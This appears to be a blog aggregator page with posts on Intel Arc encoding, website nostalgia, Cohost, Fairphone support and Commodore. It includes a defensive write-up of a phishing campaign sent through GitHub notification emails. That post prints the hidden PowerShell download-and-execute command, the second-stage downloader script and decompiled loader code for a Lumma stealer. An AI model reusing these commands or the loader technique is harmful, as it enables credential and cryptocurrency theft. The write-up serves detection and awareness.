Full Width [alt+shift+f] Shortcuts [alt+shift+k]
Sign Up [alt+shift+s] Log In [alt+shift+l]
22
Securing My Web Infrastructure A few months ago, I very briefly mentioned that I've migrated all my web infrastructure off Cloudflare, as well as having built a custom web service to host it all. I call this new web service WebCentral and I'd like to talk about some of the steps I've taken and lessons I've learned about how I secure my infrastructure. Building a Threat Model Before you can work to secure any service, you need to understand what your threat model is. This sounds more complicated than it really is; all you must do is consider what your risks how, how likely those risks are to be realized, and what the potential damage or impact those risks could have. My websites don't store or process any user data, so I'm not terribly concerned about exfiltration, instead my primary risks are unauthorized access to the server, exploitation of my code, and denial of service. Although the risks of denial of service are self-explanatory, the primary risk I see needing to protect against...
2 months ago

Improve your reading experience

Logged in users get linked directly to articles resulting in a better reading experience. Please login for free, it takes less than 1 minute.

More from Ian's Blog

Hardware-Accelerated Video Encoding with Intel Arc on Redhat Linux

I've been wanting hardware-accelerated video encoding on my Linux machine for quite a while now, but ask anybody who's used a Linux machine and they'll tell you of the horrors of Nvidia or AMD drivers. Intel, on the other hand, seems to be taking things in a much different, much more positive direction when it comes to their Arc graphics cards. I've heard positive things from people who use them about the relativly painless driver experience, at least when compared to Nvidia. So I went out and grabbed a used Intel Arc A750 locally and installed it in my server running Rocky 9.4. This post is to document what I did to install the required drivers and support libraries to be able to encode videos with ffmpeg utilizing the hardware of the GPU. This post is specific to Redhat Linux and all Redhat-compatible distros (Rocky, Oracle, etc). If you're using any other distro, this post likely won't help you. Driver Setup The drivers for Intel Arc cards were added into the Linux Kernel in version 6.2 or later, but RHEL 9 uses kernel version 5. Thankfully, Intel provides a repo specific to RHEL 9 where they offer precompiled backports of the drivers against the stable kernel ABI of RHEL 9. Add the Intel Repo Add the following repo file to /etc/yum.repos.d. Note that I'm using RHEL 9.4 here. You will likely need to change 9.4 to whatever version you are using by looking in /etc/redhat-release. Update the baseurl value and ensure that URL exists. [intel-graphics-9.4-unified] name=Intel graphics 9.4 unified enabled=1 gpgcheck=1 baseurl=https://repositories.intel.com/gpu/rhel/9.4/unified/ gpgkey=https://repositories.intel.com/gpu/intel-graphics.key Run dnf clean all for good measure. Install the Software dnf install intel-opencl \ intel-media \ intel-mediasdk \ libmfxgen1 \ libvpl2 \ level-zero \ intel-level-zero-gpu \ mesa-dri-drivers \ mesa-vulkan-drivers \ mesa-vdpau-drivers \ libdrm \ mesa-libEGL \ mesa-lib Reboot your machine for good measure. Verify Device Availability You can verify that your GPU is seen using the following: clinfo | grep "Device Name" Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics ffmpeg Setup Install ffmpeg ffmpeg needs to be compiled with libvpl support. For simplicities sake, you can use this pre-compiled static build of ffmpeg. Download the ffmpeg-master-latest-linux64-gpl.tar.xz binary. Verify ffmpeg support If you're going to use a different copy of ffmpeg, or compile it yourself, you'll want to verify that it has the required support using the following: ./ffmpeg -hide_banner -encoders|grep "qsv" V..... av1_qsv AV1 (Intel Quick Sync Video acceleration) (codec av1) V..... h264_qsv H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10 (Intel Quick Sync Video acceleration) (codec h264) V..... hevc_qsv HEVC (Intel Quick Sync Video acceleration) (codec hevc) V..... mjpeg_qsv MJPEG (Intel Quick Sync Video acceleration) (codec mjpeg) V..... mpeg2_qsv MPEG-2 video (Intel Quick Sync Video acceleration) (codec mpeg2video) V..... vp9_qsv VP9 video (Intel Quick Sync Video acceleration) (codec vp9) If you don't have any qsv encoders, your copy of ffmpeg isn't built correctly. Converting a Video I'll be using this video from the Wikimedia Commons for reference, if you want to play along at home. This is a VP9-encoded video in a webm container. Let's re-encode it to H.264 in an MP4 container. I'll skip doing any other transformations to the video for now, just to keep things simple. ./ffmpeg -i Sea_to_Sky_Highlights.webm -c:v h264_qsv Sea_to_Sky_Highlights.mp4 The key parameter here is telling ffmpeg to use the h264_qsv encoder for the video, which is the hardware-accelerated codec. Let's see what kind of difference using hardware acceleration makes: Encoder Time Average FPS h264_qsv (Hardware) 3.02s 296 libx264 (Software) 1m2.996s 162 Using hardware acceleration sped up this operation by 95%. Naturally your numbers won't be the same as mine, as there's lots of variables at play here, but I feel this is a good demonstration that this was a worthwhile investment.

7 months ago 32 votes
Having a Website Used to Be Fun

According to the Wayback Machine, I launched my website over a decade ago, in 2013. Just that thought alone makes me feel old, but going back through the old snapshots of my websites made me feel a profound feeling of longing for a time when having a website used to be a novel and enjoyable experience. The Start Although I no longer have the original invoice, I believe I purchased the ianspence.com domain in 2012 when I was studying web design at The Art Institute of Vancouver. Yes, you read that right, I went to art school. Not just any, mind you, but one that was so catastrophically corrupt and profit-focused that it imploded as I was studying there. But thats a story for another time. I obviously didn't have any real plan for what I wanted my website to be, or what I would use it for. I simply wanted a web property where I could play around with what I was learning in school and expand my knowledge of PHP. I hosted my earliest sites from a very used Dell Optiplex GX280 tower in my house on my residential internet. Although the early 2010's were a rough period of my life, having my very own website was something that I was proud of and deeply enjoyed. Somewhere along the way, all that enjoyment was lost. And you don't have to take my own word for it. Just compare my site from 2013 to the site from when I wrote this post in 2024. Graphic Design was Never My Passion 2013's website has an animated carousel of my photography, bright colours, and way too many accordions. Everything was at 100% because I didn't really care about so much about the final product more as I was just screwing around and having fun. 2024's website is, save for the single sample of my photography work, a resume. Boring, professional, sterile of anything resembling personality. Even though the style of my site became more and more muted over the years, I continued to work and build on my site, but what I worked on changed as what I was interested in grew. In the very early 2010s I thought I wanted to go into web design, but after having suffered 4 months of the most dysfunctional Art school there is, I realized that maybe it was web development that interested me. That, eventually, grew into the networking and infrastructure training I went through, and the career I've built for myself. Changing Interests As my interests changed, my focus on the site became less about the design and appearance and more towards what was serving the site itself. My site literally moved out from the basement suite I was living in to a VPS, running custom builds of PHP and Apache HTTPD. At one point, I even played around with load-balancing between my VPS and my home server, which had graduated into something much better than that Dell. Or, at least until my internet provider blocked inbound port 80. This is right around when things stopped being fun anymore. When Things Stopped Being Fun Upon reflection, there were two big mistakes I made that stole all of the enjoyment out of tinkering with my websites: Cloudflare and Scaling. Cloudflare A dear friend of mine (that one knows I'm referring to it) introduced me to Cloudflare sometime in 2014, which I believe was the poison pill that started my journey into taking the fun out of things for me. You see, Cloudflare is designed for big businesses or people with very high traffic websites. Neither of which apply to me. I was just some dweeb who liked PHP. Cloudflare works by sitting between your website's hosting server and your visitors. All traffic from your visitors flows through Cloudflare, where they can do their magic. When configured properly, the original web host is effectively hidden from the web, as people have to go through Cloudflare first. This was the crux of my issues, at least with the focus of this blog post, with Cloudflare. For example, before Lets Encrypt existed, Cloudflare did not allow for TLS at all on their free plans. This was right at the time when I was just starting to learn about TLS, but because I had convinced myself that I had to use Cloudflare, I could never actually use it on my website. This specific problem of TLS never went away, either, as even though Cloudflare now offers free TLS - they have total control over everything and they have the final say in what is and isn't allowed. The problems weren't just TLS, of course, because if you wanted to handle non-HTTP traffic then you couldn't use Cloudflare's proxy. Once again, I encountered the same misguided fear that exposing my web server to the internet was a recipe for disaster. Scaling (or lack thereof) The other, larger, mistake I made was an obsession with scaling and security. Thanks to my education I had learned a lot about enterprise networking and systems administration, and I deigned to apply those skills to my own site. Aggressive caching, using global CDNs, monitoring, automated deployments, telemetry, obsession over response times, and probably more I'm not remembering. All for a mostly static website for a dork that had maybe 5 page views a month. This is a mistake that I see people make all the time, not even just exclusive for websites - people think that they need to be concerned about scaling problems without first asking if those problems even or will ever apply to them. If I was able to host my website from an abused desktop tower with blown caps on cable internet just fine, then why in the world would I need to be obsessing over telemetry and response times. Sadly things only got even worse when I got into cybersecurity, because now on top of all the concerns with performance and scale, I was trying to protect myself from exceedingly unlikely threats. Up until embarrassingly recently I was using complicated file integrity checks using hardware-backed cryptographic keys to ensure that only I could make changes to the content of my site. For some reason, I had built this threat model in my head where I needed to protect against malicious changes on an already well-protected server. All of this created an environment where making any change at all was a cumbersome and time-consuming task. Is it any wonder why I ended up making my site look like a resume when doing any changes to it was so much work? The Lesson I Learned All of this retrospective started because of the death of Cohost, as many of the folks there (myself included) decided to move to posting on their own blogs. This gave me a great chance to see what some of my friends were doing with their sites, and unlocking fond memories of back in 2012 and 2013 when I too was just having fun with my silly little website. All of this led me down to the realization of the true root cause of my misery: In an attempt to try and mimic what enterprises do with their websites in terms of stability and security, I made it difficult to make any changes to my site. Realizing this, I began to unravel the design and decisions I had made, and come up with a much better, simpler, and most of all enjoyable design. How my Website Used to Work The last design of my website that existed before I came to the conclusions I discussed above was as follows: My website was a packaged Docker container image which ran nginx. All of the configuration and static files were included in the image, so theoretically it could run anywhere. That image was being run on Azure Container Instances, a managed container platform, with the image hosted on Azure Container Registries. Cloudflare sat in-front of my website and proxied all connections to it. They took care of the domain registration, DNS, and TLS. Whenever I wanted to make changes to my site, I would create a container image, sign it using a private key on my YubiKey, and push that to Github. A Github action would then deploy that image to Azure Container Registries and trigger the container to restart, pulling the new image. How my Website Works Now Now that you've seen the most ridiculous design for some dork's personal website, let me show you how it works now: Yes, it's really that simple. My websites are now powered by a virtual machine with a public IP address. When users visit my website, they talk directly to that virtual machine. When I want to make changes to my website, I just push them directly to that machine. TLS certificates are provided by Lets Encrypt. I still use Cloudflare as my domain registrar and DNS provider, but - crucially - nothing is proxied through Cloudflare. When you loaded this blog post, your browser talked directly to my server. It's almost virtually identical to the way I was doing things in 2013, and it's been almost invigorating to shed this excess weight and unnecessary complications. But there's actually a whole lot going on behind the scenes that I'm omitting from this graph. Static Websites Are Boring A huge problem with my previous design is that I had locked myself into only having a pure static website, and static websites are boring! Websites are more fun when they can, you know, do things, and doing things with static websites is usually dependent on Javascript and doing them in the users browser. That's lame. Let's take a really simple example: Sometimes I want to show a banner on the top of my website. In a static-only website, unless you hard-code that banner into the HTML, doing this from a static site would require that you use JavaScript to check some backend if a banner should be displayed, and if so - render it. But on a dynamic page? Where server-side rendering is used? This is trivially easy. A key change with my new website is switching away from using containers, which are ephemeral and immutable, over to using a virtual machine, which isn't, and to go back to server-side rendering. I realized that a lot of the fun I was having back then was because PHP is server-side, and you can do a lot of wacky things when you have total control over the server! I'm really burying the lede here, but my new site is powered not by nginx, or httpd, but instead my own web server. Entirely custom and designed for tinkering and hacking. Combined with no longer having to deal with Cloudflare, has given me total control to do whatever the hell I want. Maybe I'll do another post some day talking about this - but I've written enough about websites for one day. Wrapping Up That feeling of wanting to do whatever the hell I want really does sum up the sentiment I've come to over the past few weeks. This is my website. I should be able to do whatever I want with it, free from my self-imposed judgement or concern over non-issues. Kill the cop in your head that tells you to share the concerns that Google has. You're not Google. Websites should be fun. Enterprise tools like Cloudflare and managed containers aren't.

7 months ago 30 votes
GitHub Notification Emails Hijacked to Send Malware

As an open source developer I frequently get emails from GitHub, most of these emails are notifications sent on behalf of GitHub users to let me know that somebody has interacted with something and requires my attention. Perhaps somebody has created a new issue on one of my repos, or replied to a comment I left, or opened a pull request, or perhaps the user is trying to impersonate GitHub security and trick me into downloading malware. If that last one sounds out of place, well, I have bad news for you - it's happened to me. Twice. In one day. Let me break down how this attack works: The attacker, using a throw-away GitHub account, creates an issue on any one of your public repos The attacker quickly deletes the issue You receive a notification email as the owner of the repo You click the link in the email, thinking it's legitimate You follow the instructions and infect your system with malware Now, as a savvy computer-haver you might think that you'd never fall for such an attack, but let me show you all the clever tricks employed here, and how attackers have found a way to hijack GitHub email system to send malicious emails directly to project maintainers. To start, let's look at the email message I got: In text form (link altered for your safety): Hey there! We have detected a security vulnerability in your repository. Please contact us at [https://]github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team Without me having already told you that this email is a notification about a new GitHub issue being created on my repo, there's virtually nothing to go on that would tell you that, because the majority of this email is controlled by the attacker. Everything highlighted in red is, in one way or another, something the attacker can control - meaning the text or content is what they want it to say: Unfortunately the remaining parts of the email that aren't controlled by the attacker don't provide us with any sufficient amount of context to know what's actually going on here. Nowhere in the email does it say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message. The attacker impersonates the "Github Security Team", and because this email is a legitimate email sent from Github, it passes most of the common phishing checks. The email is from Github, and the link in the email goes to where it says it does. GitHub can improve on these notification emails to reduce the effectiveness of this type of attack by providing more context about what action is the email for, reducing the amount of attacker-controlled content, and improving clarity about the sender of the email. I have contacted Github security (the real one, not the fake imposter one) and shared these emails with them along with my concerns. The Website If you were to follow through with the link on that email, you'd find yourself on a page that appears to have a captcha on it. Captcha-gated sites are annoyingly common, thanks in part to services like Cloudflare which offers automated challenges based on heuristics. All this to say that users might not find a page immediately demanding they prove that they are human not that out of the ordinary. What is out of the ordinary is how the captcha works. Normally you'd be clicking on a never-ending slideshow of sidewalks or motorcycles as you definitely don't help train AI, but instead this site is asking you to take the very specific step of opening the Windows Run box and pasting in a command. Honestly, if solving captchas were actually this easy, I'd be down for it. Sadly, it's not real - so now let's take a look at the malware. The Malware The site put the following text in my clipboard (link modified for your safety): powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752" We'll consider this stage 1 of 4 of the attack. What this does is start a new Windows PowerShell process with the window hidden and run a command to download a script file and execute it. iex is a built-in alias for Invoke-Expression, and iwr is Invoke-WebRequest. For Linux users out there, this is equal to calling curl | bash. A comment is at the end of the file that, due to the Windows run box being limited in window size, effectively hides the first part of the script, so the user only sees this: Between the first email I got and the time of writing, the URL in the script have changed, but the contents remain the same. Moving onto the second stage, the contents of the evaluated script file are (link modified for your safety): $webClient = New-Object System.Net.WebClient $url1 = "[https://]github-scanner[.]com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe This script is refreshingly straightforward, with virtually no obfuscation. It downloads a file l6E.exe, saves it as <User Home>\AppData\Local\Temp\SysSetup.exe, and then runs that file. I first took a look at the exe itself in Windows Explorer and noticed that it had a digital signature to it. The certificate used appears to have come from Spotify, but importantly the signature of the malicious binary is not valid - meaning it's likely this is just a spoofed signature that was copied from a legitimately-signed Spotify binary. The presence of this invalid codesigning signature itself is interesting, because it's highlighted two weaknesses with Windows that this malware exploits. I would have assumed that Windows would warn you before it runs an exe with an invalid code signature, especially one downloaded from the internet, but turns out that's not entirely the case. It's important to know how Windows determines if something was downloaded from the internet, and this is done through what is commonly called the "Mark of the Web" (or MOTW). In short, this is a small flag set in the metadata of the file that says it came from the internet. Browsers and other software can set this flag, and other software can look for that flag to alter settings to behave differently. A good example is how Office behaves with a file downloaded from the internet. If you were to download that l6E.exe file in your web browser (please don't!) and tried to open it, you'd be greeted with this hilariously aged dialog. Note that at the bottom Windows specifically highlights that this application does not have a valid signature. But this warning never appears for the victim, and it has to do with the mark of the web. Step back for a moment and you'll recall that it's not the browser that is downloading this malicious exe, instead it's PowerShell - or, more specifically, it's the System.Net.WebClient class in .NET Framework. This class has a method, DownloadFile which does exactly that - downloads a file to a local path, except this method does not set the MOTW flag for the downloaded file. Take a look at this side by side comparison of the file downloaded using the same .NET API used by the malware on the left and a browser on the right: This exposes the other weakness in Windows; Windows will only warn you when you try to run an exe with an invalid digital signature if that file has the mark of the web. It is unwise to rely on the mark of the web in any way, as it's trivially easy to remove that flag. Had the .NET library set that flag, the attacker could have easily just removed it before starting the process. Both of these weaknesses have been reported to Microsoft, but for us we should stop getting distracted by code signing certificates and instead move on to looking at what this dang exe actually does. I opened the exe in Ghidra and then realized that I know nothing about assembly or reverse engineering, but I did see mentions of .NET in the output, so I moved to dotPeek to see what I could find. There's two parts of the code that matter, the entrypoint and the PersonalActivation method. The entrypoint hides the console window, calls PersonalActivation twice in a background thread, then marks a region of memory as executable with VirtualProtect and then executes it with CallWindowProcW. private static void Main(string[] args) { Resolver resolver = new Resolver("Consulter", 100); Program.FreeConsole(); double num = (double) Program.UAdhuyichgAUIshuiAuis(); Task.Run((Action) (() => { Program.PersonalActivation(new List<int>(), Program.AIOsncoiuuA, Program.Alco); Program.PersonalActivation(new List<int>(), MoveAngles.userBuffer, MoveAngles.key); })); Thread.Sleep(1000); uint ASxcgtjy = 0; Program.VirtualProtect(ref Program.AIOsncoiuuA[0], Program.AIOsncoiuuA.Length, 64U, ref ASxcgtjy); int index = 392; Program.CallWindowProcW(ref Program.AIOsncoiuuA[index], MoveAngles.userBuffer, 0, 0, 0); } The PersonalActivation function takes in a list and two byte arrays. The list parameter is not used, and the first byte array is a data buffer and the second is labeled as key - this, plus the amount of math they're doing, gives it away that is is some form of decryptor, though I'm not good enough at math to figure out what algorithm it is. I commented out the two calls to VirtualProtect and CallWindowProcW and compiled the rest of the code and ran it in a debugger, so that I could examine the contents of the two decrypted buffers. The first buffer contains a call to CreateProcess 00000000 55 05 00 00 37 13 00 00 00 00 00 00 75 73 65 72 U...7.......user 00000010 33 32 2E 64 6C 6C 00 43 72 65 61 74 65 50 72 6F 32.dll.CreatePro 00000020 63 65 73 73 41 00 56 69 72 74 75 61 6C 41 6C 6C cessA.VirtualAll 00000030 6F 63 00 47 65 74 54 68 72 65 61 64 43 6F 6E 74 oc.GetThreadCont 00000040 65 78 74 00 52 65 61 64 50 72 6F 63 65 73 73 4D ext.ReadProcessM 00000050 65 6D 6F 72 79 00 56 69 72 74 75 61 6C 41 6C 6C emory.VirtualAll 00000060 6F 63 45 78 00 57 72 69 74 65 50 72 6F 63 65 73 ocEx.WriteProces 00000070 73 4D 65 6D 6F 72 79 00 53 65 74 54 68 72 65 61 sMemory.SetThrea 00000080 64 43 6F 6E 74 65 78 74 00 52 65 73 75 6D 65 54 dContext.ResumeT 00000090 68 72 65 61 64 00 39 05 00 00 BC 04 00 00 00 00 hread.9...¼..... 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0 00 00 00 00 00 00 43 3A 5C 57 69 6E 64 6F 77 73 ......C:\Windows 000000C0 5C 4D 69 63 72 6F 73 6F 66 74 2E 4E 45 54 5C 46 \Microsoft.NET\F 000000D0 72 61 6D 65 77 6F 72 6B 5C 76 34 2E 30 2E 33 30 ramework\v4.0.30 000000E0 33 31 39 5C 52 65 67 41 73 6D 2E 65 78 65 00 37 319\RegAsm.exe.7 [...] And the second buffer, well, just take a look at the headers you might just see what's going on :) 00000000 4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00 MZx............. 00000010 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 ............x... 00000040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ..º..´.Í!¸.LÍ!Th 00000050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 00000060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 00000070 6D 6F 64 65 2E 24 00 00 50 45 00 00 4C 01 04 00 mode.$..PE..L... So now we know that the large byte arrays at the top of the code are an "encrypted" exe that this loader puts into memory, marks it as executable, and then executes it. Marvelous. Sadly, this is where I hit a wall as my skills at reverse engineering applications are very limited. The final stage of the attack is a Windows exe, but not one made with .NET, and I don't really know what I'm looking at in the output from Ghidra. Thankfully, however, actual professionals have already done the work for me! Naturally, I put both the first and second binaries into VirusTotal and found that they were already flagged by a number of AVs. A common pattern in the naming was "LUMMASTEALER", which gives us our hint as to what this malware is. Lumma is one of many malware operations (read: gangs) that offer a "malware as a service" product. Their so-called "stealer" code searches through your system for cryptocurrency wallets, stored credentials, and other sensitive data. This data is then sent to their command-and-control (C2) servers where the gang can then move on to either stealing money from you, or profit from selling your data online. Lumma's malware tends to not encrypt victims devices such as traditional ransomware operations do. For more information I recommend this excellent write-up from Cyfirma. If you made it this far, thanks for reading! I had a lot of fun looking into the details of this attack, ranging from the weakness in Github's notification emails to the multiple layers of the attack. Some of the tools I used to help me do this analysis were: Windows Sandbox Ghidra dotPeek HxD Visual Studio Updates: Previously I said that the codesigning certificate was stolen from Spotify, however after discussing my findings with DigiCert we agreed that this is not the case and rather that the signature is being spoofed.

9 months ago 22 votes
Mourning the Loss of Cohost

The staff running Cohost have announced (archived) that at the end of 2024 Cohost will be shutting down, with the site going read-only on October 1st 2024. This news was deeply upsetting to receive, as Cohost filled a space left by other social media websites when they stopped being fun and became nothing but tools of corporations. Looking Back I joined Cohost in October of 2022 when it was still unclear if elon musk would go through with his disastrous plan to buy twitter. The moment that deal was confirmed, I abandoned my Twitter account and switched to using Cohost only for a time and never looked back once. I signed up for Cohost Plus! a week later after seeing the potential for what Cohost could become, and what it could mean for a less commercial future. I believed in Cohost. I believed that I could be witness to the birth of a better web, not built on advertising, corporate greed, privacy invasion - but instead on a focus of people, the content they share, and the communities they build. The loss of Cohost is greater than just the loss of the community of friends I've made, it's the dark cloud that has now formed over people who shared their vision, the rise of the question of "why bother". When I look back to my time on twitter, I'm faced with mixed feelings. I dearly miss the community that I had built there - some of us scattered to various places, while others decided to take their leave entirely from social media. I am sad knowing that, despite my best efforts of trying to maintain the connections I've made, I will lose touch with my friends because there is no replacement for Cohost. Although I miss my friends from twitter, I've come to now realize how awful twitter was for me and my well-being. It's funny to me that back when I was using twitter, I and seemingly everybody else knew that twitter was a bad place, and yet we all continued to use it. Even now, well into its nazi bar era, people continue to use it. Cohost showed what a social media site could be if the focus was not on engagement, but on the community. The lack of hard statistics like follower or like count meant that Cohost could never be a popularity contest - and that is something that seemingly no other social media site has come to grips with. The Alternatives Many people are moving, or have already moved, to services like Mastodon and Bluesky. While I am on Mastodon, these services have severe flaws that make them awful as a replacement for Cohost. Mastodon is a difficult to understand web of protocols, services, terminology, and dogma. It suffers from critical "open source brain worm" where libertarian ideals take priority over important safety and usability aspects, and I do not see any viable way to resolve these issues. Imagine trying to convince somebody who isn't technical to "join mastodon". How are they ever going to understand the concept of decentralization, or what an instance is, or who runs the instance, or what client to use, or even what "fediverse" means? This insurmountable barrier ensures that only specific people are taking part in the community, and excludes so many others. Bluesky is the worst of both worlds of being both technically decentralized while also very corporate. It's a desperate attempt to clone twitter as much as possible without stopping for even a moment to evaluate if that includes copying some of twitter's worst mistakes. Looking Forward When it became clear that I was going to walk away from my twitter account there was fear and anxiety. I knew that I would lose connections, some of which I had to work hard to build, but I had to stick to my morals. In the end, things turned out alright. I found a tight-nit community of friends in a private Discord server, found more time to focus on my hobbies and less on doomscrolling, and established this very blog. I know that even though I am very sad and very angry about Cohost, things will turn out alright. So long, Cohost, and thank you, Jae, Colin, Aiden, and Kara for trying. You are all an inspiration to not just desire a better world, but to go out and make an effort to build it. I'll miss you, eggbug.

9 months ago 18 votes

More in technology

My horrible Fairphone customer care experience

Fairphone has bad customer support. It’s not an issue with the individual customer support agents, I know how difficult their job is1, and I’m sure that they’re trying their best, but it’s a more systematic issue in the organization itself. It’s become so bad that Fairphone issued an open letter to the Fairphone community forum acknowledging the issue and steps they’re taking to fix it. Until then, I only have my experience to go by. I’ve contacted Fairphone customer support twice, once with a question about Fairphone 5 security updates not arriving in a timely manner, and another time with a request to refund the Fairphone Fairbuds XL as part of the 14-day policy. In both cases, I received an initial reply over 1 month later. It’s not that catastrophic for a non-critical query, but in situations where you have a technical issue with a product, this can become a huge inconvenience for the customer. I recently gave the Fairbuds XL a try because the reviews for it online were decent and I want to support the Fairphone project, but I found the sound profile very underwhelming and the noise cancelling did not work adequately.2 I decided to use the 14-day return policy that Fairphone advertise, which led to the worst customer care experience I’ve had so far.3 Here’s a complete timeline of the process on how to return a set of headphones to the manufacturer for a refund. 2025-02-10: initial purchase of the headphones 2025-02-14: I receive the headphones and test them out, with disappointing results 2025-02-16: I file a support ticket with Fairphone indicating that I wish to return the headphones according to their 14-day return policy 2025-02-25: I ask again about the refund after not hearing back from Faiprhone 2025-03-07: I receive an automated message that apologized for the delay and asked me to not make any additional tickets on the matter, which I had not been doing 2025-04-01: I start the chargeback process for the payment through my bank due to Fairphone support not replying over a month later 2025-04-29: Fairphone support finally responds with instructions on how to send back the device to receive a refund 2025-05-07: after acquiring packaging material and printing out three separate documents (UPS package card, invoice, Cordon Electronics sales voucher), I hand the headphones over to UPS 2025-05-15: I ask Fairphone about when the refund will be issued 2025-05-19 16:20 EEST: I receive a notice from Cordon Electronics confirming they have received the headphones 2025-05-19 17:50 EEST: I receive a notice from Cordon Electronics letting me know that they have started the process, whatever that means 2025-05-19 20:05 EEST: I receive a notice from Cordon Electronics saying that the repairs are done and they are now shipping the device back to me (!) 2025-05-19 20:14 EEST: I contact Fairphone support about this notice that I received, asking for a clarification 2025-05-19 20:24 EEST: I also send an e-mail to Cordon Electronics clarifying the situation and asking them to not send the device back to me, but instead return it to Fairphone for a refund 2025-05-20 14:42 EEST: Cordon Electronics informs me that they have already shipped the device and cannot reverse the decision 2025-05-21: Fairphone support responds, saying that it is being sent back due to a processing error, and that I should try to “refuse the order” 2025-05-22: I inform Fairphone support about the communication with Cordon Electronics 2025-05-27: Fairphone is aware of the chargeback that I initiated and they believe the refund is issued, however I have not yet received it 2025-05-27: I receive the headphones for the second time. 2025-05-28: I inform Fairphone support about the current status of the headphones and refund (still not received) 2025-05-28: Fairphone support recommends that I ask the bank about the status of the refund, I do so but don’t receive any useful information from them 2025-06-03: Fairphone support asks if I’ve received the refund yet 2025-06-04: I receive the refund through the dispute I raised through the bank. This is almost 4 months after the initial purchase took place. 2025-06-06: Fairphone sends me instructions on how to send back the headphones for the second time. 2025-06-12: I inform Fairphone that I have prepared the package and will post it next week due to limited access to a printer and the shipping company office 2025-06-16: I ship the device back to Fairphone again. There’s an element of human error in the whole experience, but the initial lack of communication amplified my frustrations and also contributed to my annoyances with my Fairphone 5 boiling over. And just like that, I’ve given up on Fairphone as a brand, and will be skeptical about buying any new products from them. I was what one would call a “brand evangelist” to them, sharing my good initial experiences with the phone to my friends, family, colleagues and the world at large, but bad experiences with customer care and the devices themselves have completely turned me off. If you have interacted with Fairphone support after this post is live, then please share your experiences in the Fairphone community forum, or reach out to me directly (with proof). I would love to update this post after getting confirmation that Fairphone has fixed the issues with their customer care and addressed the major shortcomings in their products. I don’t want to crap on Fairphone, I want them to do better. Repairability, sustainability and longevity still matter. I haven’t worked as a customer care agent, but I have worked in retail, so I roughly know what level of communication the agents are treated with, often unfairly. ↩︎ that experience reminded me of how big of a role music plays in my life. I’ve grown accustomed to using good sounding headphones and I immediately noticed all the little details being missing in my favourite music. ↩︎ until this point, the worst experience I had was with Elisa Eesti AS, a major ISP in Estonia. I wanted to use my own router-modem box that was identical to the rented one from the ISP, and that only got resolved 1.5 months later after I expressed intent to switch providers. Competition matters! ↩︎

yesterday 5 votes
Comics from 1977/07 Issue of ROM

Only two, so read them slowly

5 days ago 8 votes
Build your own 4DOF robotic arm on a budget

Robot arms are very cool and can be quite useful, but they also tend to be expensive. That isn’t just markup either, because the components themselves are pricey. However, you can save a lot of money if you make some sacrifices and build everything yourself. In that case, you can follow Ruben Sanchez’s tutorial to […] The post Build your own 4DOF robotic arm on a budget appeared first on Arduino Blog.

5 days ago 6 votes
Tandy Corporation, Part 3

Becoming IBM Compatible

a week ago 9 votes
There's not much point in buying Commodore

Bona fides: Commodore 128DCR on my desk with a second 1571, Ultimate II+-L and a ZoomFloppy, three SX-64s I use for various projects, heaps of spare 128DCRs, breadbox 64s, 16s, Plus/4s and VIC-20s on standby, multiple Commodore collectables (blue-label PET 2001, C64GS, 116, TV Games, 1551, 1570), a couple A500s, an A3000 and a AmigaOS 3.9 QuikPak A4000T with '060 CPU, Picasso IV RTG card and Ethernet. I wrote for COMPUTE!'s Gazette (during the General Media years) and Loadstar. Here's me with Jack Tramiel and his son Leonard from a Computer History Museum event in 2007. It's on my wall. Retro Recipes video (not affiliated) stating that, in answer to a request for a very broad license to distribute under the Commodore name, Commodore Corporation BV instead simply proposed he buy them out, which would obviously transfer the trademark to him outright. Amiga News has a very nice summary. There was a time when Commodore intellectual property and the Commodore brand had substantial value, and that time probably ended around the mid-2000s. Prior to that point after Commodore went bankrupt in 1994, a lot of residual affection for the Amiga and the 64/128 still circulated, the AmigaOS still had viability for some applications and there might have been something to learn from the hardware, particularly the odder corners like the PA-RISC Hombre. That's why there was so much turmoil over the corpse, from Escom's abortive buyout to the split of the assets. Today the Commodore name (after many shifts and purchases and reorgs) is presently held by Commodore Corporation BV, a Netherlands company, who licenses it out. Pretty much the rest of it is split into the hardware patents (now with Acer after their buyout of Gateway 2000) and the remaining IP (Amiga Corporation, effectively Cloanto). The Commodore brand after the company's demise has had an exceptionally poor track record in the market. Many of us remember the 1999 Commodore 64 Web.it, licensed by Escom, which was a disastrously bad set-top 486 PC sold as an "Internet computer" whose only link to CBM was the Commodore name and a built-in 64 emulator. Reviewers savaged it and they've become collectors' items purely for the lulz. In 2007, Tulip licensee Commodore Gaming tried again with PC gaming rigs sold as the Commodore XX, GS, GX and G (are these computers or MPAA ratings?) and special wraps called C=kins (say it "skins"). I went to the launch party in L.A. — 8-Bit Weapon was there, hi Seth and Michelle! — and I even have one of their T-shirts around someplace. The company subsequently ran out of money and their most consequential legacy was the huge and heavily branded case. More recently, in 2010, another American company called itself Commodore USA LLC and tried developing new keyboard computers, most notably the (first) Commodore 64x. These were otherwise underpowered PCs using mini-ATX motherboards in breadboard-like cases where cooling was an obvious issue. They also tried selling "VICs" (which didn't look like VIC-20s) and "Amigas" (which were Intel i7 systems), and introduced their own Linux-based Commodore OS. Opinions were harsh and the company went under after its CEO died in 2012. Dishonourable mentions include Tulip-Yeahronimo's 2004 MP3 player line, sold as the (inexplicably) e-VIC, m-PET and f-PET, and the PET smartphone, a 2015 otherwise unremarkable Android device with its own collection of on-board emulators. 